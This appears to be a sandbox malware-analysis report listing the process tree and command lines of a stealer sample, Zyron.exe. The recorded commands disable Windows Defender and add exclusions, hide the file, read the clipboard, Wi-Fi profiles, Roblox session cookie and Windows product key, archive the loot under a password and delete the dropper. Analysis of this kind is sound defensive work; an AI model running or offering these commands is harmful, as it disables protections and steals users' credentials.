N/A N/A \??\c:\users\admin\appdata\local\temp\_mei50802\rar.exe  N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1816 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 1816 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 4880 wrote to memory of 1548 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 4880 wrote to memory of 1548 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 1548 wrote to memory of 2300 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2300 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4628 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4628 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1216 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1216 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3204 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3204 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 396 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 396 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2300 wrote to memory of 3232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 3232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 3384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1216 wrote to memory of 3384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3204 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3204 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4628 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 396 wrote to memory of 3620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 396 wrote to memory of 3620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 1616 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\tree.com
PID 1548 wrote to memory of 1616 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\tree.com
PID 1616 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1616 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1548 wrote to memory of 1900 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\System32\Conhost.exe
PID 1548 wrote to memory of 1900 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\System32\Conhost.exe
PID 1900 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1900 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1548 wrote to memory of 2736 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2736 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2736 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 5076 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 5076 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5076 wrote to memory of 3220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 4596 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 4596 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 3228 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\wbem\wmiprvse.exe
PID 1548 wrote to memory of 3228 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\wbem\wmiprvse.exe
PID 3228 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4596 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4596 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1548 wrote to memory of 60 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 60 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2328 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2328 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2328 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2328 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 60 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 60 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 2084 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2084 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2200 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2200 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2160 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2160 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4816 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4816 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Zyron.exe

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'

C:\Windows\system32\attrib.exe

attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cj3lxvzi\cj3lxvzi.cmdline"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8666.tmp" "c:\Users\Admin\AppData\Local\Temp\cj3lxvzi\CSCD8E5FF1D5B2B4571A40C33BB0E7D381.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48802\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\j6XOA.zip" *"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\_MEI48802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI48802\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\j6XOA.zip" *

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe PR

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Zyron.exe

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\attrib.exe

attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\exbwlwpg\exbwlwpg.cmdline"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES73A4.tmp" "c:\Users\Admin\AppData\Local\Temp\exbwlwpg\CSC143BBAF1AEDE42BF8B1F899AB24C6AFB.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

